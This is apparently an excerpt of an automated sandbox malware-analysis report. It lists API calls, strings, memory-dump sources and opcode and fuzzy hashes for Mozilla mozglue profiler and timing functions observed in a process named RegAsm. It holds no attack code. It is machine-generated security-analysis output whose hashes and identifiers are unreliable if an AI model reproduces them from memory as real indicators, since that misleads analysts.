                                                                                                                                                          • Part of subcall function 6C64F070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C64F0AC
                                                                                                                                                          • Part of subcall function 6C64F070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C64F0BE
                                                                                                                                                        Strings
                                                                                                                                                        • [I %d/%d] profiler_pause, xrefs: 6C64F008
                                                                                                                                                        • [I %d/%d] profiler_stop, xrefs: 6C64EED7
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CurrentThread$ExclusiveLock$Release$AcquireTime_getpidgetenv$ProcessStampV01@@Value@mozilla@@free$?profiler_time@baseprofiler@mozilla@@BufferCloseEnterExit@mozilla@@HandleInit_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@Now@ObjectProfilerRegisterSingleStamp@mozilla@@TerminateV12@_Wait__acrt_iob_func__stdio_common_vfprintf
                                                                                                                                                        • String ID: [I %d/%d] profiler_pause$[I %d/%d] profiler_stop
                                                                                                                                                        • API String ID: 16519850-1833026159
                                                                                                                                                        • Opcode ID: a49d98490e3fa1e4e1f8dcd7776d480c74bca506ab2d42d2dac3f8d42ea58bc4
                                                                                                                                                        • Instruction ID: 6f68a383f755f4ecae97d7c59711952f76fe380b3263bd77d7547f44db4d66a7
                                                                                                                                                        • Opcode Fuzzy Hash: a49d98490e3fa1e4e1f8dcd7776d480c74bca506ab2d42d2dac3f8d42ea58bc4
                                                                                                                                                        • Instruction Fuzzy Hash: 1651E635602210BFDB00AB66D888BA97BB4EF87358F10C526E91583B42D7754809CBBF
                                                                                                                                                        Function 6C615E60 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 182threadstringtimeCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C615E9D
                                                                                                                                                          • Part of subcall function 6C625B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C6256EE,?,00000001), ref: 6C625B85
                                                                                                                                                          • Part of subcall function 6C625B50: EnterCriticalSection.KERNEL32(6C68F688,?,?,?,6C6256EE,?,00000001), ref: 6C625B90
                                                                                                                                                          • Part of subcall function 6C625B50: LeaveCriticalSection.KERNEL32(6C68F688,?,?,?,6C6256EE,?,00000001), ref: 6C625BD8
                                                                                                                                                          • Part of subcall function 6C625B50: GetTickCount64.KERNEL32 ref: 6C625BE4
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C615EAB
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C615EB8
                                                                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C615ECF
                                                                                                                                                        • memcpy.VCRUNTIME140(00000000,GeckoMain,00000000), ref: 6C616017
                                                                                                                                                          • Part of subcall function 6C604310: moz_xmalloc.MOZGLUE(00000010,?,6C6042D2), ref: 6C60436A
                                                                                                                                                          • Part of subcall function 6C604310: memcpy.VCRUNTIME140(00000023,?,?,?,?,6C6042D2), ref: 6C604387
                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000004), ref: 6C615F47
                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 6C615F53
                                                                                                                                                        • GetCurrentThread.KERNEL32 ref: 6C615F5C
                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 6C615F66
                                                                                                                                                        • DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6C615F7E
                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000024), ref: 6C615F27
                                                                                                                                                          • Part of subcall function 6C61CA10: mozalloc_abort.MOZGLUE(?), ref: 6C61CAA2
                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C6155E1), ref: 6C615E8C
                                                                                                                                                          • Part of subcall function 6C61CA10: malloc.MOZGLUE(?), ref: 6C61CA26
                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000050,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C6155E1), ref: 6C61605D
                                                                                                                                                        • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C6155E1), ref: 6C6160CC
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Currentmoz_xmalloc$Thread$CriticalProcessSectionmemcpy$Count64CounterDuplicateEnterHandleLeaveNow@PerformanceQueryStamp@mozilla@@TickTimeV12@_freemallocmozalloc_abortstrlen
                                                                                                                                                        • String ID: GeckoMain
                                                                                                                                                        • API String ID: 3711609982-966795396
                                                                                                                                                        • Opcode ID: a5e06ebbc09d4f57006caee3540747dbb494dab81c08d15ac5ece0d352031ffd
                                                                                                                                                        • Instruction ID: 46774e2325fe573b30328bf1f39c50c0b59e4c1e6e91b1dd399c00f6ee1052ab
                                                                                                                                                        • Opcode Fuzzy Hash: a5e06ebbc09d4f57006caee3540747dbb494dab81c08d15ac5ece0d352031ffd
                                                                                                                                                        • Instruction Fuzzy Hash: DB71C1B06097409FD710DF29C480A6ABBF0FF8A305F54496DE58687B52D730E948CBAA
                                                                                                                                                        Function 6C619590 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 192libraryloaderCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 6C6031C0: LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6C603217
                                                                                                                                                          • Part of subcall function 6C6031C0: GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6C603236
                                                                                                                                                          • Part of subcall function 6C6031C0: FreeLibrary.KERNEL32 ref: 6C60324B
                                                                                                                                                          • Part of subcall function 6C6031C0: __Init_thread_footer.LIBCMT ref: 6C603260
                                                                                                                                                          • Part of subcall function 6C6031C0: ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6C60327F
                                                                                                                                                          • Part of subcall function 6C6031C0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C60328E
                                                                                                                                                          • Part of subcall function 6C6031C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C6032AB
                                                                                                                                                          • Part of subcall function 6C6031C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C6032D1
                                                                                                                                                          • Part of subcall function 6C6031C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C6032E5
                                                                                                                                                          • Part of subcall function 6C6031C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C6032F7
                                                                                                                                                        • LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C619675
                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C619697
                                                                                                                                                        • LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C6196E8
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C619707
                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C61971F
                                                                                                                                                        • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C619773
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C6197B7
                                                                                                                                                        • FreeLibrary.KERNEL32 ref: 6C6197D0
                                                                                                                                                        • FreeLibrary.KERNEL32 ref: 6C6197EB
                                                                                                                                                        • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C619824
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: LibraryTime$StampV01@@Value@mozilla@@$AddressFreeInit_thread_footerLoadProc$ErrorLastStamp@mozilla@@$Creation@Now@ProcessV12@V12@_
                                                                                                                                                        • String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
                                                                                                                                                        • API String ID: 3361784254-3880535382
                                                                                                                                                        • Opcode ID: 35ab22d9f16fbcaf5fea408ca7dbcfe9b31e6ea094f6a190bbd73b46ca77b58a
                                                                                                                                                        • Instruction ID: 9495da241eb4927d42ad5624f297b9cc98dfb54800bd3d16e6db891f34c0a29c
                                                                                                                                                        • Opcode Fuzzy Hash: 35ab22d9f16fbcaf5fea408ca7dbcfe9b31e6ea094f6a190bbd73b46ca77b58a
                                                                                                                                                        • Instruction Fuzzy Hash: 5061E871606201AFEF00DF6AE8D8B9A7BB4EF4B319F104529E91597B40D7309854CBBE
                                                                                                                                                        Function 6C666660 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 162threadCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • InitializeCriticalSection.KERNEL32(6C68F618), ref: 6C666694
                                                                                                                                                        • GetThreadId.KERNEL32(?), ref: 6C6666B1
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C6666B9
                                                                                                                                                        • memset.VCRUNTIME140(?,00000000,00000100), ref: 6C6666E1
                                                                                                                                                        • EnterCriticalSection.KERNEL32(6C68F618), ref: 6C666734
                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 6C66673A
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6C68F618), ref: 6C66676C
                                                                                                                                                        • GetCurrentThread.KERNEL32 ref: 6C6667FC
                                                                                                                                                        • memset.VCRUNTIME140(?,00000000,000002C8), ref: 6C666868
                                                                                                                                                        • RtlCaptureContext.NTDLL ref: 6C66687F
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalCurrentSectionThread$memset$CaptureContextEnterInitializeLeaveProcess
                                                                                                                                                        • String ID: WalkStack64
                                                                                                                                                        • API String ID: 2357170935-3499369396
                                                                                                                                                        • Opcode ID: 12aba6e5b6fde774beaeabaff212d0d476ee187395c156706207a1d07c0a042b
                                                                                                                                                        • Instruction ID: fdaed06e82c52788ad17506af5d46a5865f88574948718225e1a50a405420aa7
                                                                                                                                                        • Opcode Fuzzy Hash: 12aba6e5b6fde774beaeabaff212d0d476ee187395c156706207a1d07c0a042b
                                                                                                                                                        • Instruction Fuzzy Hash: 1751A071A0A301AFD711CF26D88479ABBF4BF8A714F00491DF59997A40D770E904CBAB
                                                                                                                                                        Function 6C64DE60 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 135threadCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 6C649420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C614A68), ref: 6C64945E
                                                                                                                                                          • Part of subcall function 6C649420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C649470
                                                                                                                                                          • Part of subcall function 6C649420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C649482
                                                                                                                                                          • Part of subcall function 6C649420: __Init_thread_footer.LIBCMT ref: 6C64949F
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C64DE73
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C64DF7D
                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6C68F4B8), ref: 6C64DF8A
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6C68F4B8), ref: 6C64DFC9
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C64DFF7
                                                                                                                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C64E000
                                                                                                                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6C614A68), ref: 6C64DE7B
                                                                                                                                                          • Part of subcall function 6C6494D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C6494EE
                                                                                                                                                          • Part of subcall function 6C6494D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C649508
                                                                                                                                                          • Part of subcall function 6C63CBE8: GetCurrentProcess.KERNEL32(?,6C6031A7), ref: 6C63CBF1
                                                                                                                                                          • Part of subcall function 6C63CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6031A7), ref: 6C63CBFA
                                                                                                                                                        • ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6C614A68), ref: 6C64DEB8
                                                                                                                                                        • free.MOZGLUE(00000000,?,6C614A68), ref: 6C64DEFE
                                                                                                                                                        • ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6C64DF38
                                                                                                                                                        Strings
                                                                                                                                                        • [I %d/%d] profiler_set_process_name("%s", "%s"), xrefs: 6C64E00E
                                                                                                                                                        • [I %d/%d] locked_profiler_stop, xrefs: 6C64DE83
                                                                                                                                                        • <none>, xrefs: 6C64DFD7
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CurrentThread$getenv$ExclusiveLockProcessRelease_getpid$AcquireBufferEnterExit@mozilla@@Init_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@ProfilerRegisterTerminate__acrt_iob_func__stdio_common_vfprintffree
                                                                                                                                                        • String ID: <none>$[I %d/%d] locked_profiler_stop$[I %d/%d] profiler_set_process_name("%s", "%s")
                                                                                                                                                        • API String ID: 1281939033-809102171
                                                                                                                                                        • Opcode ID: 8a6426dcdf7e9d073ca28811bbbb3bb594c8d564fc9172bed2122cb4f9292bc5
                                                                                                                                                        • Instruction ID: 49f2adc90237a9bb10148221d620359c734e0b5c02e28a8634a21246738e7b35
                                                                                                                                                        • Opcode Fuzzy Hash: 8a6426dcdf7e9d073ca28811bbbb3bb594c8d564fc9172bed2122cb4f9292bc5
                                                                                                                                                        • Instruction Fuzzy Hash: EE410771B02510ABDB209F66D8487AA7775EF8734CF54C116E90597B42C7709806CBFE
                                                                                                                                                        Function 6C65D4D0 Relevance: 21.2, APIs: 14, Instructions: 165threadCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C65D4F0
                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C65D4FC
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C65D52A
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C65D530
                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C65D53F
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C65D55F
                                                                                                                                                        • free.MOZGLUE(00000000), ref: 6C65D585
                                                                                                                                                        • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C65D5D3
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C65D5F9
                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C65D605
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C65D652
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C65D658
                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C65D667
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C65D6A2
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExclusiveLock$AcquireCurrentReleaseThread$Xbad_function_call@std@@free
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2206442479-0
                                                                                                                                                        • Opcode ID: f8008af5896ec7dfbbdedd3ebc01b75c3f4d1b6252a162f87c7a9ed167b9303a
                                                                                                                                                        • Instruction ID: f4a278eeda3b46f9cae127b3fd66c46bae691a26c7eb8aff55abb823cdc5966f
                                                                                                                                                        • Opcode Fuzzy Hash: f8008af5896ec7dfbbdedd3ebc01b75c3f4d1b6252a162f87c7a9ed167b9303a
                                                                                                                                                        • Instruction Fuzzy Hash: 9F519071605705EFC700CF35C888A9ABBF4FF8A358F50862DE94A87751DB30A855CBA9
                                                                                                                                                        Function 6C625670 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 272timeCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_APP_RESTART), ref: 6C6256D1
                                                                                                                                                        • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C6256E9
                                                                                                                                                        • ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ.MOZGLUE ref: 6C6256F1
                                                                                                                                                        • ?TicksFromMilliseconds@BaseTimeDurationPlatformUtils@mozilla@@SA_JN@Z.MOZGLUE ref: 6C625744
                                                                                                                                                        • ??0TimeStampValue@mozilla@@AAE@_K0_N@Z.MOZGLUE(?,?,?,?,?), ref: 6C6257BC
                                                                                                                                                        • GetTickCount64.KERNEL32 ref: 6C6258CB
                                                                                                                                                        • EnterCriticalSection.KERNEL32(6C68F688), ref: 6C6258F3
                                                                                                                                                        • __aulldiv.LIBCMT ref: 6C625945
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6C68F688), ref: 6C6259B2
                                                                                                                                                        • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(6C68F638,?,?,?,?), ref: 6C6259E9
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Time$CriticalSectionStampStamp@mozilla@@Value@mozilla@@$BaseComputeCount64DurationEnterFromLeaveMilliseconds@Now@PlatformProcessTickTicksUptime@Utils@mozilla@@V01@@V12@___aulldivgetenv
                                                                                                                                                        • String ID: MOZ_APP_RESTART
                                                                                                                                                        • API String ID: 2752551254-2657566371
                                                                                                                                                        • Opcode ID: d0b77877cbdac0e0de90b9862b6791b4b6f9acba5907e60b8c56051dbde6c491
                                                                                                                                                        • Instruction ID: 67d5a8a2db79f057ec644b7e773d637d1b8a62fe6507e58938f8d5b6a1899b21
                                                                                                                                                        • Opcode Fuzzy Hash: d0b77877cbdac0e0de90b9862b6791b4b6f9acba5907e60b8c56051dbde6c491
                                                                                                                                                        • Instruction Fuzzy Hash: 7AC19D31A09390AFD715CF29C48066AB7F1BFCB314F158B1DE8C4A7664D734A885CB9A
                                                                                                                                                        Function 6C64EC70 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 81threadsynchronizationCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 6C649420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C614A68), ref: 6C64945E
                                                                                                                                                          • Part of subcall function 6C649420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C649470
                                                                                                                                                          • Part of subcall function 6C649420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C649482
                                                                                                                                                          • Part of subcall function 6C649420: __Init_thread_footer.LIBCMT ref: 6C64949F
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C64EC84
                                                                                                                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C64EC8C
                                                                                                                                                          • Part of subcall function 6C6494D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C6494EE
                                                                                                                                                          • Part of subcall function 6C6494D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C649508
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C64ECA1
                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6C68F4B8), ref: 6C64ECAE
                                                                                                                                                        • ?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000), ref: 6C64ECC5
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6C68F4B8), ref: 6C64ED0A
                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C64ED19
                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 6C64ED28
                                                                                                                                                        • free.MOZGLUE(00000000), ref: 6C64ED2F
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6C68F4B8), ref: 6C64ED59
                                                                                                                                                        Strings
                                                                                                                                                        • [I %d/%d] profiler_ensure_started, xrefs: 6C64EC94
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExclusiveLockgetenv$CurrentReleaseThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
                                                                                                                                                        • String ID: [I %d/%d] profiler_ensure_started
                                                                                                                                                        • API String ID: 4057186437-125001283
                                                                                                                                                        • Opcode ID: fb2323764b7947454e2bb21450588ffd54039ea0ba4dfdc044f7ae000a5f59a2
                                                                                                                                                        • Instruction ID: a8890f89fe33868e7f5cbf61bf51becf64b1d5f09242ae2278feb18353a9164c
                                                                                                                                                        • Opcode Fuzzy Hash: fb2323764b7947454e2bb21450588ffd54039ea0ba4dfdc044f7ae000a5f59a2
                                                                                                                                                        • Instruction Fuzzy Hash: 8D219175601104BFDB009F65DC48A9AB779EF8736DF10C211F91897742DB3598068BBE
                                                                                                                                                        Function 6C648ED0 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 311COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 6C60EB30: free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C60EB83
                                                                                                                                                        • ?FormatToStringSpan@MarkerSchema@mozilla@@CA?AV?$Span@$$CBD$0PPPPPPPP@@2@W4Format@12@@Z.MOZGLUE(?,?,00000004,?,?,?,?,?,?,6C64B392,?,?,00000001), ref: 6C6491F4
                                                                                                                                                          • Part of subcall function 6C63CBE8: GetCurrentProcess.KERNEL32(?,6C6031A7), ref: 6C63CBF1
                                                                                                                                                          • Part of subcall function 6C63CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6031A7), ref: 6C63CBFA
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
